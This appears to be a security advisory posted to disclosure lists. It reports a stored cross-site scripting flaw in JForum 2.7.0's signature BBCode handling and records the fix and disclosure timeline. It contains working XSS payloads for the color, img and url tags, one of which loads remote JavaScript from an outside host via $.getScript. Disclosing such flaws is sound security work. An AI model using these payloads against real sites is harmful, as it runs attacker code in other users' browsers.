hi, I found a vulnerability in the jforum 2.7.0. It is a storage cross site script vulnerability. The place is the user's profile - signature. The technique of the vulnerability is the same as that described in this article "STORED CROSS SITE SCRIPTING IN BBCODE" ( https://mindedsecurity.com/advisories/msa130510/), and the POC is: color tag: [color=red" onMouseOver="alert('xss')]XSS[/color] [color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js') ;"]XSS[/color] Renders into HTML: <font onmouseover="alert('xss')" color="red">XSS</font> <font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');" color="red">XSS</font> img tag: [img]/demo.jpg" onMouseOver="alert('xss')[/img] Renders into HTML: <img src="/demo.jpg" onmouseover="alert('xss')" alt="image"> url= tag: [url='http://www.demo.com" onMouseOver="alert('xss')']test[/url] Renders into HTML: <a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')" target="_blank">test</a> through analysis, the forum has set the cookie to http-only, but the attacker can use the $.getScript to do some evil things. this vulnerability has been fixed in https://sourceforge.net/p/jforum2/code/934/ . timeline: 2021-04-21 announce the developer of Jforum by e-mail 2021-04-22 Jforum fixed the vulnerability, and will include this fix in next release 2021-09-02 send this mail to bugtraq&fulldisclosure